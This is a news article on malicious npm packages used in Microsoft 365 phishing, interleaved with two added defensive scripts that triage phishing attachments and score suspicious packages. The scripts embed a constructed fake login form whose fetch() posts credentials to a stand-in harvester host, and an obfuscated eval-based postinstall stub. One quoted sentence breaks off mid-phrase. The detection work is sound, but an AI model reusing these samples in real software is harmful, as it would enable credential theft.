New Campaigns Use Malicious npm Packages to Support Phishing Kits

Several malicious npm packages on open source repositories have been used in supply chain attacks and phishing campaigns.

The findings come from ReversingLabs researchers, who said in a blog post published Thursday that the packages pose a double threat: they support email-based phishing attacks that primarily target Microsoft 365 users, and they also put at risk the end users of any application that unknowingly bundles them.

Software threat researcher Lucija Valentić said her team found more than a dozen malicious npm packages published between May 11th and June 13th.

These packages mimicked legitimate modules such as jquery, which has millions of downloads every week. The malicious packages were downloaded roughly 1,000 times, but were quickly removed from npm once detected.

ReversingLabs dubbed the campaign “Operation Brainleeches” after the malicious infrastructure used to siphon off victims’ data.

During the first part of the campaign, researchers identified six packages used exclusively to support phishing attacks. These were linked to phishing campaigns that collected user data through fake Microsoft.com login forms delivered as malicious email attachments.

The second tranche consisted of seven packages that supported both email phishing campaigns and software supply chain attacks. These packages were designed to embed credential-harvesting scripts in any application that unknowingly included them as a dependency.
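The attachment-borne fake login form described above is the part of this campaign a mail gateway or incident responder can check for mechanically. The following triage script is an added example, not code from the ReversingLabs report or from the packages themselves: it pulls every form out of an HTML attachment, keeps the ones that ask for a password, and flags any whose submit target (or any URL referenced from inline script) is not one of the brand's own sign-in hosts. The allowlist of Microsoft sign-in hosts and the two sample attachments are assumptions constructed for the demonstration.

```javascript
// Added example (not from the ReversingLabs report): triage an HTML email attachment
// for a credential-harvesting login form. The allowlist of Microsoft sign-in hosts
// and the two sample attachments below are assumptions constructed for this demo.
const BRAND_LOGIN_HOSTS = new Set(["login.microsoftonline.com", "login.live.com"]);

// Hostname of an absolute URL, or null if the value is relative, empty or malformed.
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch (_) {
    return null;
  }
}

// Return every <form> in the document with its action attribute and inner markup.
function extractForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const action = (m[1].match(/\baction\s*=\s*["']([^"']*)["']/i) || ["", ""])[1];
    forms.push({ action, body: m[2] });
  }
  return forms;
}

// Absolute URLs referenced from inline scripts (fetch/XHR targets, loaders).
function extractScriptUrls(html) {
  const urls = new Set();
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    for (const u of m[1].match(/https?:\/\/[^\s"'`)]+/g) || []) urls.add(u);
  }
  return [...urls];
}

function triageAttachment(html) {
  const findings = [];
  const mentionsBrand = /microsoft|office\s*365|outlook/i.test(html);
  for (const form of extractForms(html)) {
    // Only forms that ask for a password matter here.
    if (!/<input\b[^>]*type\s*=\s*["']?password/i.test(form.body)) continue;
    const host = hostOf(form.action);
    // A password form in an attachment that posts anywhere but the brand's own
    // sign-in hosts (including a relative or missing action, which a JS handler
    // usually rewires) is the phishing-kit pattern.
    if (host === null || !BRAND_LOGIN_HOSTS.has(host)) {
      findings.push({ kind: "password-form", target: form.action || "(none)", host });
    }
  }
  for (const url of extractScriptUrls(html)) {
    const host = hostOf(url);
    if (host !== null && !BRAND_LOGIN_HOSTS.has(host)) {
      findings.push({ kind: "script-url", target: url, host });
    }
  }
  let verdict = "clean";
  if (findings.length > 0) verdict = mentionsBrand ? "phishing-likely" : "suspicious";
  return { verdict, findings };
}

// Constructed sample: a fake Microsoft sign-in page that posts credentials to an
// attacker-controlled host (.invalid TLD, so it can never resolve).
const PHISHING_ATTACHMENT = `<!doctype html><html><body>
<h2>Microsoft</h2><p>Sign in to view the document shared with you</p>
<form id="f" action="https://collect.example-harvester.invalid/post.php" method="POST">
  <input type="email" name="login" placeholder="Email, phone, or Skype">
  <input type="password" name="passwd">
  <button type="submit">Sign in</button>
</form>
<script>
  document.getElementById("f").addEventListener("submit", function () {
    fetch("https://collect.example-harvester.invalid/post.php", { method: "POST" });
  });
</script>
</body></html>`;

// Constructed control: an ordinary attachment with a search form and no password field.
const BENIGN_ATTACHMENT = `<html><body><form action="https://example.com/search">
<input type="text" name="q"></form></body></html>`;

console.log(JSON.stringify(triageAttachment(PHISHING_ATTACHMENT), null, 2));
```

The regex-based form extraction is deliberate: an attachment is untrusted input, so it is parsed as text rather than loaded into a DOM. A form with no action at all is still flagged, because kits commonly leave the action empty and exfiltrate from a submit handler, which the inline-script URL pass catches.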


ReversingLabs’ analysis shows that malicious npm packages are being used in active phishing campaigns, likely run by low-skilled attackers. The full extent of the supply chain attack is unknown, but the use of obfuscated code and of names that imitate popular packages such as jquery raises concerns about potential compromise of downstream applications.

Valentić said the findings underscore the importance of organizations staying vigilant against malicious or compromised open source packages.

“This campaign further underscores the need for organizations to pay attention to signs that open source packages may be malicious or compromised. Not paying attention is the cause, but it’s not the only one,” she added.

“The use of obfuscated code is a serious red flag. Other indicators include suspicious naming and package versioning, new packages with rough histories, smaller than expected downloads and dependencies, etc. will be

Probing the functionality and behavior of third-party code and tracking dependencies are also important for detecting potential threats.
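The red flags Valentić lists (obfuscated code, suspicious naming and versioning, new packages with thin histories, lower-than-expected downloads) and the advice to probe a package's behaviour can be turned into a first-pass triage score. The script below is an added example, not ReversingLabs' tooling or anything from the packages: it scores a package from its registry metadata and entry script, using edit distance to catch lookalikes of popular names, age and version count for history, weekly downloads for uptake, install-time lifecycle hooks for behaviour, and a few static obfuscation heuristics. The list of popular names, the thresholds and both sample packages are assumptions constructed for the demonstration.

```javascript
// Added example (not ReversingLabs' tooling): score an npm package against the
// red flags listed above from its registry metadata and entry script. The list of
// popular names, the thresholds and both sample packages are assumptions made for
// this demonstration; wire the fields to `npm view` / the downloads API in practice.
const POPULAR_NAMES = ["jquery", "lodash", "express", "react", "axios"];

// Edit distance, used to catch typosquats and lookalike names.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(row[j] + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Cheap static hints that a script has been obfuscated or decodes itself at run time.
// Legitimately minified bundles also trip some of these, so treat them as signals.
function obfuscationIndicators(src) {
  const hits = [];
  const hexEscapes = (src.match(/\\x[0-9a-f]{2}/gi) || []).length;
  if (hexEscapes > 20) hits.push(`hex-escaped strings (${hexEscapes})`);
  if (/\b_0x[0-9a-f]{4,}\b/.test(src)) hits.push("obfuscator-style identifiers (_0x....)");
  if (/\beval\s*\(|new\s+Function\s*\(/.test(src)) hits.push("dynamic code execution (eval/Function)");
  if (/\batob\s*\(|String\.fromCharCode/.test(src)) hits.push("run-time string decoding");
  const longest = Math.max(0, ...src.split("\n").map((line) => line.length));
  if (longest > 500) hits.push(`very long line (${longest} chars)`);
  return hits;
}

function triagePackage(pkg, nowMs) {
  const flags = [];
  for (const name of POPULAR_NAMES) {
    const d = levenshtein(pkg.name, name);
    if (d > 0 && d <= 2) flags.push(`name within ${d} edits of ${name}`);
  }
  const ageDays = (nowMs - Date.parse(pkg.created)) / 86400000;
  if (ageDays < 30) flags.push(`published ${ageDays.toFixed(0)} days ago`);
  if (pkg.versionCount <= 2) flags.push(`thin history (${pkg.versionCount} version(s))`);
  if (pkg.weeklyDownloads < 1000) flags.push(`low uptake (${pkg.weeklyDownloads} downloads/week)`);
  for (const hook of ["preinstall", "install", "postinstall"]) {
    // Lifecycle scripts run on `npm install`, before any app code is reviewed.
    if (pkg.scripts && pkg.scripts[hook]) flags.push(`${hook} hook: ${pkg.scripts[hook]}`);
  }
  flags.push(...obfuscationIndicators(pkg.entrySource));
  return { name: pkg.name, score: flags.length, flags };
}

const NOW = Date.parse("2023-06-13T00:00:00Z"); // end of the reported window

// Constructed lookalike: a hypothetical name two edits from jquery, one version,
// a postinstall hook and a hex-escaped, eval-driven entry script.
const SUSPECT_PACKAGE = {
  name: "jqeury",
  created: "2023-05-20T10:00:00Z",
  versionCount: 1,
  weeklyDownloads: 140,
  scripts: { postinstall: "node index.js" },
  entrySource:
    'var _0x1a2b=["' + "\\x68\\x74\\x74\\x70\\x73".repeat(5) + '"];' +
    'eval(String.fromCharCode(102,101,116,99,104)+"("+_0x1a2b[0]+")");',
};

// Constructed control with an unremarkable profile.
const CONTROL_PACKAGE = {
  name: "acme-widgets",
  created: "2019-02-01T00:00:00Z",
  versionCount: 41,
  weeklyDownloads: 25000,
  scripts: { test: "node test.js" },
  entrySource: "module.exports = function add(a, b) {\n  return a + b;\n};\n",
};

console.log(JSON.stringify(triagePackage(SUSPECT_PACKAGE, NOW), null, 2));
```

The score is a ranking aid for review, not a verdict: a freshly published, low-download package with an honest postinstall step is common, and minified bundles trip the long-line check. What separates the constructed suspect from the control is that every indicator fires at once, which is the profile this campaign's packages fit.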
